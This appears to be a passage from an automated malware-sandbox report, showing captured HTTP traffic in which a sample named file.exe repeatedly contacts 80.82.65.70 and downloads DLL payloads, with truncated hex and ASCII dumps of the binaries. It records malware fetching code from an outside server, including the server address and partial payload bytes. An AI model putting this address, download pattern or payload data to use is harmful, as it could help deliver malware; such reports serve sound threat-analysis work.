                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:42.752149105 CET1236INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:42 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                              Content-Length: 97296
                                              Keep-Alive: timeout=5, max=98
                                              Connection: Keep-Alive
                                              Content-Type: application/octet-stream
                                              Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                              Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                              Dec 13, 2024 10:48:42.752208948 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                              Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                              Dec 13, 2024 10:48:42.752326012 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                              Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                              Dec 13, 2024 10:48:42.752360106 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                              Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                              Dec 13, 2024 10:48:42.752438068 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                              Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                              Dec 13, 2024 10:48:42.752470016 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                              Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                              Dec 13, 2024 10:48:42.752546072 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                              Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                              Dec 13, 2024 10:48:42.752589941 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                              Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                              Dec 13, 2024 10:48:42.760556936 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                              Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                              Dec 13, 2024 10:48:42.760658979 CET556INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                              Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                              Dec 13, 2024 10:48:42.766603947 CET1236INData Raw: c4 2b ef bd 7d 2c 43 08 ed 7b 6b 29 6e 0e 1f c4 b7 82 38 dd 6c d9 86 f4 10 35 b0 a5 85 fc 11 b1 d2 2f 8d 77 64 e2 a9 08 d7 d5 3c d2 4a 6a 78 59 69 0f 6c e4 a9 b3 24 c6 f4 58 9a 23 39 7d c7 13 4c f7 63 fc 1e b2 57 02 df 46 1e fd 6d 66 5c 34 7b 69
                                              Data Ascii: +},C{k)n8l5/wd<JjxYil$X#9}LcWFmf\4{iEd"Fl@=l5scroIjyjGEQAQ.b3zH;7[R?b&=Z}BH(-uKDnVc]F?`(&z=eSO'gu)
                                              Dec 13, 2024 10:48:43.250017881 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:43.736414909 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:43 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=97
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:45.778191090 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:46.273844004 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:45 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=96
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:48.339608908 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:48.834713936 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:48 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=95
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:50.886564016 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:51.369728088 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:51 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=94
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:53.402832031 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:53.714023113 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:53.891000032 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:53 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=93
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:55.964778900 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:56.470319986 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:56 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=92
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:58.496692896 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:58.998207092 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:58 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=91
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:01.028338909 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:01.519903898 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:01 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=90
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:03.652170897 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:04.136853933 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:03 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=89
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:06.324368000 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:06.817585945 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:06 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=88
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:49:08.980671883 CET393OUTGET /files/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: C
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:09.481319904 CET203INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:09 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=87
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.64985880.82.65.70807480C:\Users\user\Desktop\file.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 13, 2024 10:49:12.694344044 CET392OUTGET /soft/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: d
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:14.179785967 CET1236INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:13 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Disposition: attachment; filename="dll";
                                              Content-Length: 242176
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/octet-stream
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                              Dec 13, 2024 10:49:14.179826021 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                              Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                              Dec 13, 2024 10:49:14.179838896 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                              Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                              Dec 13, 2024 10:49:14.179971933 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                              Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                              Dec 13, 2024 10:49:14.179985046 CET1236INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                              Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                              Dec 13, 2024 10:49:14.179996967 CET1236INData Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00
                                              Data Ascii: o/(z*{*v0rpsAz}(*{*v}(,}(*{*:}(*{*:}(*({o{ZX/{o{ZX((*J{ooo*J{oxo*2{
                                              Dec 13, 2024 10:49:14.180010080 CET1236INData Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e
                                              Data Ascii: }(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*2{o*^{{oo*:}(m*:
                                              Dec 13, 2024 10:49:14.180169106 CET1236INData Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03
                                              Data Ascii: {+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2s}-*}6{=ob-{=o\*rTp(;&*z,{<,{<o/(z*:{0ot*:{/ot
                                              Dec 13, 2024 10:49:14.180191040 CET1236INData Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00
                                              Data Ascii: (9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}d*(Co(D}d(F(E(&*";*><}n*{u*"}u*{v*"}v*{w*"
                                              Dec 13, 2024 10:49:14.180203915 CET556INData Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22
                                              Data Ascii: ,{o#*o*{o(,{o)o,***u*{*"}*{*J{{(*F(uNoK*J(uNoL*F(uNoM*J(uNoN*{*"}*{*"}*{*"}*
                                              Dec 13, 2024 10:49:14.299777031 CET1236INData Raw: 02 03 7d d1 01 00 04 2a 1e 02 7b d2 01 00 04 2a 22 02 03 7d d2 01 00 04 2a 1e 02 7b d3 01 00 04 2a 22 02 03 7d d3 01 00 04 2a 1e 02 7b d4 01 00 04 2a 22 02 03 7d d4 01 00 04 2a 1e 02 7b d5 01 00 04 2a 22 02 03 7d d5 01 00 04 2a 1e 02 7b d6 01 00
                                              Data Ascii: }*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                              Dec 13, 2024 10:49:15.043659925 CET392OUTGET /soft/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: s
                                              Host: 80.82.65.70
